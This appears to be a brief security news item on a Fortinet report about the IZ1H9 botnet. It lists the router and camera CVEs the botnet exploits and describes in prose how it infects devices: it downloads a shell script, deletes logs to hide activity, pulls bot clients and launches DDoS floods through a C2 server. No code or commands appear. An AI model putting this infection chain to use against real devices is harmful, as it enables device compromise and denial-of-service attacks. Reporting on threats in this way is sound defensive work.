New exploits added
Fortinet reports that the botnet uses exploits for flaws dating from 2015 to 2023.
- Four of these flaws concern D-Link devices.
- Eight other exploits target arbitrary command execution flaws belonging to products from Geutebruck.
- One flaw tracked as CVE-2019-19356 targets Netis WF2419.
- The arsenal of IZ1H9 also includes an exploit for a command injection vulnerability (CVE-2023-23295) in Korenix JetWave routers, one for remote code execution vulnerability (for CVE-2019-19356) in Netis WF2419 wireless routers, and another for a command injection issue (CVE-2021-36380) Sunhillo SureLine application.
- Additionally, the botnet incorporates exploits 12 command execution vulnerabilities affecting TOTOLINK routers.
- After exploiting one of the aforementioned CVEs, a IZ1H9 botnet payload is injected into the device.
- This payload contains a command that instructs the device to download a shell script downloader named “l.sh” from a specific URL.
- When the downloaded script is executed, it first deletes logs to hide any malicious activity.
- It then retrieves bot clients that are designed to work on different system architectures.
- After completing these actions, the bot establishes communication with a C2 server to launch different types of DDoS attacks such as UDP, UDP Plain, HTTP Flood, and TCP SYN.
Exposure of devices to these vulnerabilities can result in severe risks. As the botnet expands its arsenal with new exploit triggers, it underscores the importance of applying security patches on time.